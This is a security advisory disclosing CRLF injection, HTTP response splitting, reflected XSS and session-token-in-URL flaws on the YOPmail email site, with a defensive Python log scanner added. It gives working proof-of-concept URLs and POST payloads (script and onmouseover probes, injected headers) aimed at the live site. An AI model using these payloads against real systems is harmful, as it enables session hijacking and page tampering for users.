Matt

YOPMail XSS / Injection / HTTP Response Splitting


Description : YOPMail suffers from cross site scripting, HTTP response splitting, CRLF injection, and session token handling vulnerabilities.

Author : Juan Carlos Garcia

Source : YOPMail XSS / Injection / HTTP Response Splitting (Packet Storm)

Code :

YOPMAIL (Anonymous & Free email address) CRLF Injection-HTTP Response Splitting/XSS/Session Token in URL
==================================================================================================================================================


Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: RESPONSE
2013-06-07: Ask About the issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Ask About the Issues
2013-06-27: Not Fixed / No Response
2013-06-28: Full Disclosure


I-VULNERABILITIES
======================

#Title: YOPMAIL (Anonymous & Free email address) YopMail CRLF Injection-HTTP Response Splitting / XSS / Session Token in URL

#Vendor:http://www.yopmail.com

#Author:Juan Carlos García (@secnight)

#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight


II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. Messages are kept for 8 days.
It is possible to send a message to another YOPmail address. No registration is required. Firefox, Internet Explorer 7 and Opera add-ons are downloadable. There are alternate domains.

Domains

@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site has new domains every three months.


III-PROOF OF CONCEPT
======================

CRLF INJECTION-HTTP RESPONSE SPLITTING
______________________________________

The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include cross-site scripting (XSS), cross-user defacement, poisoning of the client's web cache, hijacking of web pages, defacement and a myriad of other related attacks.

Attacks
-------

http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717


Multiple CROSS SITE SCRIPTING
_______________________________

The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.

Attacks
--------

Below I expose only a few of the vulnerabilities, because there are many failures of this type in this web service... So much XSS..

Affected items
/add-domain.php
/alternate-domains.php
/alternate-email-address.php
/conditions.php
/contact.php
/definitions/email-jetable.php
/definitions/mail-anonyme.php
/definitions/spam.php
/donation.php
/email-anonyme.php
/email-generator.php
/en
/en/add-domain.php
/en/alternate-domains.php
/en/alternate-email-address.php
/en/conditions.php
/en/contact.php
/en/definitions
/en/definitions/email-jetable.php
/en/definitions/mail-anonyme.php
/en/definitions/spam.php
/en/donation.php
/en/email-anonyme.php
/en/email-generator.php
/en/faq.php
/en/images
/en/index.php
/en/plugins.php
/en/privacy.php
/en/send-mail.php
/en/style
/en/style/pic
/en/yopmail-chat.php
/es
/es/add-domain.php
/es/alternate-domains.php
/es/alternate-email-address.php
/es/conditions.php
/es/contact.php
/es/definitions
/es/definitions/email-jetable.php
/es/definitions/mail-anonyme.php
/es/definitions/spam.php
/es/donation.php
/es/email-anonyme.php
/es/email-generator.php
/es/faq.php
/es/images
/es/index.php
/es/plugins.php
/es/privacy.php
/es/send-mail.php
/es/style
/es/style/pic
/es/yopmail-chat.php
/faq.php
/fr
/fr/add-domain.php
/fr/alternate-domains.php
/fr/alternate-email-address.php
/fr/conditions.php
/fr/contact.php
/fr/definitions
/fr/definitions/email-jetable.php
/fr/definitions/mail-anonyme.php
/fr/definitions/spam.php
/fr/donation.php
/fr/email-anonyme.php
/fr/email-generator.php
/fr/faq.php
/fr/images
/fr/index.php
/fr/plugins.php
/fr/privacy.php
/fr/send-mail.php
/fr/style
/fr/style/pic
/fr/yopmail-chat.php
/index.php
/it
/it/add-domain.php
/it/alternate-domains.php
/it/alternate-email-address.php
/it/conditions.php
/it/contact.php
/it/definitions
/it/definitions/email-jetable.php
/it/definitions/mail-anonyme.php
/it/definitions/spam.php
/it/donation.php
/it/email-anonyme.php
/it/email-generator.php
/it/faq.php
/it/images
/it/index.php
/it/plugins.php
/it/privacy.php
/it/send-mail.php
/it/style
/it/style/pic
/it/yopmail-chat.php
/pl
/pl/add-domain.php
/pl/alternate-domains.php
/pl/alternate-email-address.php
/pl/conditions.php
/pl/contact.php
/pl/definitions
/pl/definitions/email-jetable.php
/pl/definitions/mail-anonyme.php
/pl/definitions/spam.php
/pl/donation.php
/pl/email-anonyme.php
/pl/email-generator.php
/pl/faq.php
/pl/images
/pl/index.php
/pl/plugins.php
/pl/privacy.php
/pl/send-mail.php
/pl/style
/pl/style/pic
/pl/yopmail-chat.php
/plugins.php
/privacy.php
/ru
/ru/add-domain.php
/ru/alternate-domains.php
/ru/alternate-email-address.php
/ru/conditions.php
/ru/contact.php
/ru/definitions
/ru/definitions/email-jetable.php
/ru/definitions/mail-anonyme.php
/ru/definitions/spam.php
/ru/donation.php
/ru/email-anonyme.php
/ru/email-generator.php
/ru/faq.php
/ru/images
/ru/index.php
/ru/plugins.php
/ru/privacy.php
/ru/send-mail.php
/ru/style
/ru/style/pic
/ru/yopmail-chat.php
/send-mail.php
/uk
/uk/add-domain.php
/uk/alternate-domains.php
/uk/alternate-email-address.php
/uk/conditions.php
/uk/contact.php
/uk/definitions
/uk/definitions/email-jetable.php
/uk/definitions/mail-anonyme.php
/uk/definitions/spam.php
/uk/donation.php
/uk/email-anonyme.php
/uk/email-generator.php
/uk/faq.php
/uk/images
/uk/index.php
/uk/plugins.php
/uk/privacy.php
/uk/send-mail.php
/uk/style
/uk/style/pic
/uk/yopmail-chat.php
/yopmail-chat.php
/zh
/zh/add-domain.php
/zh/alternate-domains.php
/zh/alternate-email-address.php
/zh/conditions.php
/zh/contact.php
/zh/definitions
/zh/definitions/email-jetable.php
/zh/definitions/mail-anonyme.php
/zh/definitions/spam.php
/zh/donation.php
/zh/email-anonyme.php
/zh/email-generator.php
/zh/faq.php
/zh/images
/zh/index.php
/zh/plugins.php
/zh/privacy.php
/zh/send-mail.php
/zh/style
/zh/style/pic
/zh/yopmail-chat.php

Method GET
----------

http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec

http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec

http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid

http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E

http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E

http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E

http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E

http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E

http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E

Method POST
------------

http://www.yopmail.com:80/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


SESSION TOKEN IN URL
____________________

This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL: URLs can be logged (server logs, proxies, browser history) or leaked to third parties via the Referer header.

Affected items
--------------

/cr.php (78a3a31e275b316f36665b35eb4bfe21)
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)

Examples

Method GET
----------

http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&

http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Method POST
-----------

/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
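Added here as an editor's example, not part of the advisory or of YOPmail's code: a defender-side Python log scanner that flags the three request shapes described in the sections above, namely a CRLF sequence inside a decoded query parameter (the cr.php cfg response-splitting case), a PHPSESSID session token carried in the URL, and the script/event-handler markers typical of the XSS probes. The access-log lines are constructed to mirror the advisory's requests; the 203.0.113.x addresses and timestamps are placeholders.

```python
import re
from typing import List, Tuple
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines modelled on the advisory's request shapes
# (not real YOPmail traffic). Format: client - - [time] "METHOD target HTTP/1.1" status
SAMPLE_LOG = """\
203.0.113.5 - - [28/Jun/2013:10:00:01 +0000] "GET /cr.php?cfg=%0d%0a%20X-Injected%3a1&r=211 HTTP/1.1" 200
203.0.113.5 - - [28/Jun/2013:10:00:02 +0000] "GET /es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 HTTP/1.1" 200
203.0.113.7 - - [28/Jun/2013:10:00:03 +0000] "GET /en/plugins.php/%22onmouseover=prompt(1)%3E HTTP/1.1" 200
203.0.113.9 - - [28/Jun/2013:10:00:04 +0000] "GET /en/faq.php?lang=en HTTP/1.1" 200
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# Parameter names that should never carry a session identifier in a URL
SESSION_PARAMS = {"phpsessid", "sessionid", "jsessionid", "sid"}
# A <script> tag, or an on*= event handler preceded by a quote or whitespace
# (the quote/space requirement avoids matching words such as "confirmation=")
XSS_MARKERS = re.compile(r"<\s*script|[\"'\s]on[a-z]+\s*=", re.IGNORECASE)


def classify_request(target: str) -> List[str]:
    """Return finding labels for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    decoded_path = unquote(parts.path)  # PATH_INFO probes such as /plugins.php/%22onmouseover=...
    params = parse_qsl(parts.query, keep_blank_values=True)  # parse_qsl percent-decodes values
    # CRLF / response splitting: a raw header line break inside a decoded parameter value
    if any("\r" in v or "\n" in v for _, v in params):
        findings.append("crlf_injection")
    # Session token transported in the query string instead of a cookie
    if any(k.lower() in SESSION_PARAMS for k, _ in params):
        findings.append("session_token_in_url")
    # Reflected-XSS probe markers in the decoded path or in any parameter value
    if XSS_MARKERS.search(decoded_path) or any(XSS_MARKERS.search(v) for _, v in params):
        findings.append("xss_probe")
    return findings


def scan_log(text: str) -> List[Tuple[str, List[str]]]:
    """Scan access-log text; return (target, findings) for every request with findings."""
    results = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            findings = classify_request(m.group("target"))
            if findings:
                results.append((m.group("target"), findings))
    return results


if __name__ == "__main__":
    for target, findings in scan_log(SAMPLE_LOG):
        print(f"{', '.join(findings):<22} {target}")
```

Run against real logs, the session-token finding is the one to act on server-side as well: with PHP's session.use_only_cookies enabled the application stops accepting PHPSESSID from the query string at all.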



IV. CREDITS
-------------------------

These vulnerabilities have been discovered
by Juan Carlos García (@secnight)


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
